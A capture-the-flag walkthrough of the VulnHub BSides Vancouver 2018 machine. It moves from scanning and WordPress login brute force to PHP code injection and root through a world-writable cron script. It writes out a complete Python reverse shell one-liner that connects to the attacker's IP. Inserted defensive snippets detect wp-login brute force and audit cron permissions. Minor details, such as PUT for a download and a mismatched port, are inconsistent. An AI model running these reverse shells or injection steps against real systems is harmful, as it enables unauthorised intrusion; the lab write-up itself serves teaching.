
BSides Vancouver: 2018 Walkthrough

July 4, 2018 by Nikhil Kumar

In this article, we will solve a Capture the Flag (CTF) challenge posted on VulnHub by "Abatchy." According to the VulnHub page, this CTF is part of the BSides Vancouver series, and the author describes it as an entry-level boot2root web-based challenge: the goal is to gain root privileges through a web application hosted on the machine. You can use the following link to download the VM and launch it on VirtualBox:

A torrent download URL is also available for this VM; it is given in the references section at the end of this article. For those who are new to CTF challenges and not familiar with the platform, VulnHub is a well-known website for security researchers that provides a series of challenges for learning and practising hacking skills in a safe and legal environment.


After downloading and running this machine on VirtualBox, we started by running netdiscover to obtain the IP address of the target machine. The command and its output can be seen in the screenshot below:

Command Used: netdiscover

As shown in the above screenshot, we obtained the virtual machine's IP address, 192.168.11.3 (the target machine IP address).

We will be using 192.168.11.11 as the attacker IP address.

Please note that the target and attacker machine IP addresses may differ depending on your network configuration.

Now that we have the target machine IP, the first step is always to find out which ports and services are available on the target machine. An Nmap full port scan is used for this purpose, as illustrated in the screenshot below:

Command Used: nmap 192.168.11.3 -p-

After the scan completed, we had three open ports on the target machine. I decided to start with the HTTP port. When opened in the browser, it shows a blank page, as seen in the following screenshot.

After that, I ran a Nikto scan against the target URL, as seen in the following screenshot.

Command Used: nikto -host http://192.168.11.3/

After waiting for a while, we got the Nikto scan result, but it produced no finding that could help us go further. So I set the Nikto result aside and ran another scan using the dirb utility to list the directories on the target machine. The scan result can be seen in the following screenshot.

Command Used: dirb http://192.168.11.3

As can be seen in the above screenshot, we only found a robots.txt, for which the server returned a 200 response code. Let us open it in the browser to see its contents. The screenshot for this can be seen below.

As can be seen in the above screenshot, we got a folder name. Let us open this folder to see its contents; I opened it in the browser, as you can see in the following screenshot.

As can be seen in the above screenshot, it is a WordPress website, and the content says "it's not being maintained." WordPress is a PHP-based CMS that releases security updates very frequently, so an unmaintained installation may well contain a vulnerability that helps us go further from here. We ran WPScan, which is available by default in Kali Linux; its output can be seen in the screenshot below. Apart from that, we noticed a login button, visible in the highlighted area of the above screenshot. We will check the login page after the WPScan result.

As can be seen in the above screenshot, WPScan completed and reported many vulnerabilities, but when I analyzed them closely, none of them led further into the target machine. So I left this here.

Another thing we got from the Nmap scan was an open FTP port (21). So let us check whether that service gives us anything.

As can be seen in the above screenshot, I connected to the target machine's FTP port with anonymous credentials. After the FTP connection was established, I found a public directory containing a file named user.txt.bk. I downloaded this file from the target machine using the PUT command, and when I opened it, I got a few usernames. You can see the same in the screenshot given below.

After getting the usernames, I tried to log in to WordPress with some random passwords, without any luck. While interacting with the login screen, I noticed that the login page is vulnerable to user enumeration, which can help me identify a valid username. It can be seen in the following screenshot.

First, I tried to log in with the username abatchy and a random password. I got the error "Invalid Username." It can be seen in the following screenshot.

This tells me that the username does not exist on the system. Then I tried another username from the list we got from FTP. It can be seen in the screenshot given below.

In the above screenshot, I tried to log in with the username john; this time I got an error saying "The password you entered for the username is incorrect." That means this username is valid on the system. Since the login screen has no CAPTCHA or account lockout mechanism, I ran a dictionary-based brute-force attack, which can be seen in the following screenshot.

As the output on the screen was very long, I could not take a full screenshot, but the notable point is the error "We have received an unknown response for login," which you can see in the above screenshot. So I tried to log in on the WordPress login page with the same username and password. This time the credentials were correct, and I could successfully log in to the admin dashboard. It can be seen in the following screenshot.
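A defender-side view of the login brute force described above, as an added example that is not part of the original walkthrough: WordPress answers a failed wp-login.php POST by re-rendering the form (HTTP 200) and a successful one with a redirect (HTTP 302), so a burst of 200s followed by a 302 from one client is the signature of a guessed password in the Apache access log. The log lines below are constructed, and the /wp-login.php path and the failure threshold are assumptions.

```python
import re
from collections import defaultdict

# Apache "combined" log pattern: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample log (not from the real target): one legitimate user who
# mistypes a password once, then an attacker guessing eight passwords for one
# account before the ninth POST is answered with the 302 of a successful login.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Jul/2018:09:59:50 +0000] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [04/Jul/2018:09:59:58 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
] + [
    f'192.168.11.11 - - [04/Jul/2018:10:00:{i:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "python-requests/2.18"'
    for i in range(1, 9)
] + [
    '192.168.11.11 - - [04/Jul/2018:10:00:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "python-requests/2.18"',
    '192.168.11.11 - - [04/Jul/2018:10:00:10 +0000] "GET /wp-admin/ HTTP/1.1" 200 9000 "-" "python-requests/2.18"',
]


def analyse(lines, threshold=5):
    """Per client IP: number of failed wp-login.php POSTs (status 200) and
    whether a successful login (302) was seen after at least `threshold` failures."""
    stats = defaultdict(lambda: {"failures": 0, "success_after_failures": False})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real job would count these too
        path = m["path"].split("?", 1)[0]
        if m["method"] != "POST" or not path.endswith("/wp-login.php"):
            continue
        entry = stats[m["ip"]]
        if m["status"] == "200":
            entry["failures"] += 1
        elif m["status"] == "302" and entry["failures"] >= threshold:
            entry["success_after_failures"] = True
    return dict(stats)


def flagged(lines, threshold=5):
    """Client IPs that exceeded the failure threshold, sorted for stable output."""
    return sorted(ip for ip, s in analyse(lines, threshold).items()
                  if s["failures"] >= threshold)
```

An IP with success_after_failures set is the one to investigate first, since a lockout or rate limit on wp-login.php would have stopped the sequence before the 302.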

So we finally got into the WordPress admin panel, but the target was to get shell access on the target machine. The easy route is to find a PHP file, inject a shell script into it and use that to get a shell on the target system. It can be seen in the following screenshot.

As can be seen in the above screenshot, we first go to Appearance and then click on Editor to inject the code. This opens an edit window, which can be seen in the following screenshot.

After opening the editor, I clicked on the footer.php file, which shows its PHP source code in the window. First I added an H1 tag just to verify that our code would work. The added h1 tag can be seen in the highlighted area; the code is saved by clicking the button at the bottom of the page.

In the above screenshot, we can see the word "hehe" in bold at the bottom of the page, which confirms that we can inject PHP code in the same manner. So I added the PHP code that can be seen in the screenshot given below.

In the highlighted area we can see the PHP code. After saving it, let us try to run a system command through the URL. First I ran the "ls" command; the output can be seen in the screenshot below.

After that I tried to run the "nc" reverse shell command to get a reverse shell from the target system, but that command didn't work. After a few failed attempts, I realized that Netcat is not available on the target machine, but Python was. It can be seen in the following screenshot.

After that, I used a Python reverse shell command to get a reverse shell from the target machine. It can be seen in the screenshot given below.

Command Used:

  • python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.11",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • nc -vlp 1234

Finally, we got a shell on the target machine, but it was a limited shell. Then I ran a few commands to enumerate basic facts about the running operating system, which can be seen in the following screenshot.

After getting the OS details, I searched for a kernel exploit to get root access on the target system, but I could not find anything useful.

While exploring the directory structure of the target server, I found some interesting information in the cron file, which can be seen in the following screenshot.

As we can see in the above screenshot, there is a cron job that runs as the root user and executes the code from the file "cleanup," whose path is shown in the highlighted area of the above screenshot.

After locating the file, I opened it with the cat command. It contains a script, which can be seen in the following screenshot.

As we can see in the above screenshot, it is a bash script that removes all the logs from the apache2 folder. After that, I checked the file permissions, which show that the file has 777 permissions, meaning we can edit it. Since the file is executed by the root user, any script we write into it will also be executed as root. So I appended the Python reverse shell script to the end of the file. It can be seen in the following screenshot.

Command Used: echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.11.11\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" >> cleanup

I added the above command at the end of the file; when the cron job executes, it will initiate a reverse connection from the target system to the attacker system on port 3434. So I started Netcat on the attacker machine to listen for the reverse connection, and after waiting for a while, I got it. As the cron job was running as the root user, this time I finally got a root reverse shell, which was verified by running another command on the attacker's machine, as can be seen in the following screenshot.

Now we finally have root access on the target machine. We are almost done, but the CTF is only complete once we find the flag. The flag file should be in the root folder, as per the information given by the author of the CTF.
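The check a defender would run for the misconfiguration exploited above, as an added example that is not part of the original walkthrough: parse /etc/crontab-style entries and, for every job that runs as root, report whether the program it executes is writable by anyone other than root. The demo() function builds a constructed crontab and a 777 script in a temporary directory; the file names cleanup and rotate are assumptions.

```python
import os
import shlex
import stat
import tempfile

def parse_system_crontab(text):
    """Yield (user, command) from /etc/crontab-style text: five time fields
    (or an @reboot-style keyword), then the user, then the command."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        head = line.split(None, 1)[0]
        if "=" in head:  # SHELL=, PATH=, MAILTO= assignments are not jobs
            continue
        keyword = head.startswith("@")
        fields = line.split(None, 2) if keyword else line.split(None, 6)
        if len(fields) == (3 if keyword else 7):
            yield fields[-2], fields[-1]

def script_issues(path):
    """Permission problems that let a non-root user change what root will run."""
    st = os.stat(path)
    issues = [name for bit, name in ((stat.S_IWOTH, "world-writable"),
                                     (stat.S_IWGRP, "group-writable"))
              if st.st_mode & bit]
    if st.st_uid != 0:
        issues.append("not-owned-by-root")  # owner can chmod it back at will
    return issues

def audit_root_jobs(crontab_text):
    """Map the program path of each root job to its list of issues."""
    report = {}
    for user, command in parse_system_crontab(crontab_text):
        prog = shlex.split(command)[0]
        if user == "root" and os.path.isabs(prog):
            report[prog] = script_issues(prog)
    return report

def demo():
    """Constructed scenario: a 777 'cleanup' script that root runs every 5 minutes."""
    d = tempfile.mkdtemp()
    bad, good = os.path.join(d, "cleanup"), os.path.join(d, "rotate")
    for path, mode in ((bad, 0o777), (good, 0o755)):
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\nrm -rf /var/log/apache2/*\n")
        os.chmod(path, mode)
    crontab = (f"SHELL=/bin/sh\n*/5 * * * * root {bad}\n"
               f"0 3 * * * root {good} --force\n0 4 * * * www-data {bad}\n")
    return audit_root_jobs(crontab)
```

On a real host, feed audit_root_jobs() the contents of /etc/crontab and the files under /etc/cron.d; the fix for any world- or group-writable hit is chmod 755 plus chown root on the script and its directory.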


As you can see in the above screenshot, we have got the flag. There was only one file in the root folder, and that was the flag file. This completes the CTF. I hope you liked this article and enjoyed learning from this machine. I would love to answer your questions; you can put them in the comments.

References:

Nikhil Kumar

Nikhil Kumar, a Certified Ethical Hacker, works as an Information Security Consultant. He has experience in web application pen-testing, social engineering, password cracking and Android pen-testing. He is also involved with various organizations, helping them strengthen the security of their applications and infrastructure.